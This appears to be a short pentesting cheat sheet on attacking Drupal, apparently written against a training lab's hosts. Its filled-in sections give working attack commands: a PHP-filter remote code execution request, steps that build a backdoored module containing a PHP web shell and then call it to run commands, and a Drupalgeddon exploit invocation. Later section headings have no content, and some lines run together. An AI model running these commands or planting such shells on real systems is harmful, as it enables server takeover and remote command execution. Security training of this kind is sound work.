6. Attacking Drupal
1. PHP Filter Module Exploitation (Drupal < 8)
curl -s http://drupal-qa.inlanefreight.local/node/3?dcfdd5e021a869fcc6dfaef8bf31377e=id2. Backdoored Module Upload
wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz
echo '<?php system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);?>' > captcha/shell.php
echo '<IfModule mod_rewrite.c>RewriteEngine On;RewriteBase /</IfModule>' > captcha/.htaccess
tar cvf captcha.tar.gz captcha/captcha/
curl -s drupal.inlanefreight.local/modules/captcha/shell.php?fe8edbabc5c5c9b7b764504cd22b17af=id3. Drupalgeddon (CVE-2014-3704)
python2.7 drupalgeddon.py -t http://drupal-qa.inlanefreight.local -u hacker -p pwnd4. Drupalgeddon2 (CVE-2018-7600)
5. Drupalgeddon3 (CVE-2018-7602)
6. Drupal Configuration File Exploitation/Security
7. Database Exploitation (SQL Injection - Expanded)
8. Form API Exploitation
9. File Upload Vulnerabilities
10. Access Control Vulnerabilities
11. Session Management Vulnerabilities
12. XML External Entity (XXE) Injection
13. Server-Side Request Forgery (SSRF)
14. Drupal Brute Forcing
Additional Notes:
Last updated